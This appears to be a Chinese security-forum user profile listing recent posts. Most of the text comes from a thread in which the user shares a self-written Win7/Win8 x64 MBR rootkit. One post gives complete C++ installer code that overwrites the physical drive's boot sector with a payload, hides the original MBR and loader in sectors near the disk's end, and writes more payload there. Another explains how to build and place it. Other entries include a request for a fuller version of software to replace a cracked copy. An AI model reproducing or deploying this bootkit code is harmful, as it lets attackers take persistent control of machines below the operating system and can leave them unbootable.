|
[求助]汇编if语句问题
没人会吗?????????????????? |
|
[求助]求ToolkitPro v16.2.6 完整版
主要是想用vs2013 目前破解版的只支持vs2010 |
|
[求助]c++内敛汇编怎么写
我是想把文本放在代码段,再压入栈作为参数。_emit 一次只能定义一个字节,哪个宏可以一次定义多个字节 |
|
[原创]发个win7 win8 x64 的MBR rookit 2年前写的。
这个我也没办法,要是不恢复MBR,后面就没办法启动,好像微软后面又调用了一次MBR。 |
|
[求助]如何禁止英雄联盟运行
想当年我也玩了2年英雄联盟,没日没夜,得了重度脂肪肝,腾讯这吸血的企业,起码限制下一天玩的时间,超过4小时,强制下线。我已经1个多月没玩了,感觉人都精神了好多。叫几个妹子到你家玩,勾引他 |
|
|
|
[原创]发个win7 win8 x64 的MBR rookit 2年前写的。
1、是应该写446到MBR,但是WriteFile只能写512的整数倍。 2、66字节包括分区表和MBR结束标志55AA 2 字节。 3、用我编译的试试看。 |
|
[原创]发个win7 win8 x64 的MBR rookit 2年前写的。
void CFileManager::WriteMbr(LPSTR lpFileFullPath) { //_asm{int 3} HANDLE hFile=pCreateFileA(lpFileFullPath,GENERIC_READ, FILE_SHARE_READ,NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile != INVALID_HANDLE_VALUE) { DWORD dwSize; dwSize = pGetFileSize(hFile, NULL); LPBYTE lpBuffer = new BYTE[dwSize]; DWORD dwBytesRead; pReadFile(hFile, lpBuffer, dwSize, &dwBytesRead, NULL); HANDLE hPhysicalDrive = CreateFile("\\\\.\\PHYSICALDRIVE0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hPhysicalDrive == INVALID_HANDLE_VALUE) { // OutputDebugString("Open Drive0 Failed!"); delete lpBuffer; CloseHandle(hFile); return; } BYTE BootSector[512];//原始MBR DWORD NumberOfBytesRead; if (SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN) == INVALID_SET_FILE_POINTER || !ReadFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL) ) { delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } BYTE backBootSector[512]; memcpy(&backBootSector,&BootSector,512); memcpy(&backBootSector,lpBuffer,446); SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN);//读文件的时候会移动指针,所以要设置下 WriteFile(hPhysicalDrive,backBootSector,512,&NumberOfBytesRead,NULL);//MBR感染446 DISK_GEOMETRY_EX pdg = { 0 }; DWORD junk = 0; // discard results DeviceIoControl(hPhysicalDrive, // device to be queried IOCTL_DISK_GET_DRIVE_GEOMETRY_EX, // operation to perform NULL, 0, // no input buffer &pdg, sizeof(pdg), // output buffer &junk, // # bytes returned (LPOVERLAPPED) NULL); // synchronous I/O //备份MBR LARGE_INTEGER PositionFileTable; PositionFileTable.QuadPart = pdg.DiskSize.QuadPart/512; PositionFileTable.QuadPart -= 10; PositionFileTable.QuadPart *= 512; NumberOfBytesRead=0; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER || !WriteFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL)) { delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } // OutputDebugString("Write Other"); //写入MBR其他数据 PositionFileTable.QuadPart = pdg.DiskSize.QuadPart/512; PositionFileTable.QuadPart -= 9; PositionFileTable.QuadPart *= 512; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER || !WriteFile(hPhysicalDrive, lpBuffer+512, ((dwSize-512)/512+1)*512, &NumberOfBytesRead, NULL))//WriteFile第三个参数必须是512的整数倍 { // OutputDebugString("Write Other Failed!"); delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } //备份MBR loader PositionFileTable.QuadPart = pdg.DiskSize.QuadPart/512; PositionFileTable.QuadPart -= 11; PositionFileTable.QuadPart *= 512; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER || !WriteFile(hPhysicalDrive, backBootSector, 512, &NumberOfBytesRead, NULL))//WriteFile第三个参数必须是512的整数倍 { // OutputDebugString("Write Other Failed!"); delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } } |
|
[原创]发个win7 win8 x64 的MBR rookit 2年前写的。
doslink aa.obj /tiny 得到aa.com aa.com 前面512字节写到mbr,注意不要覆盖分区表。512字节后面的数据写到磁盘倒数第11个扇区。原始mbr写到倒数第10扇区. |
|
[原创]发个win7 win8 x64 的MBR rookit 2年前写的。
人生第一个精华,开心啊 |
|
键盘过滤驱动卸载蓝屏问题,IRP也已经释放了,还是蓝屏
有这个的设置的,卸载时是为0才卸载的 |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值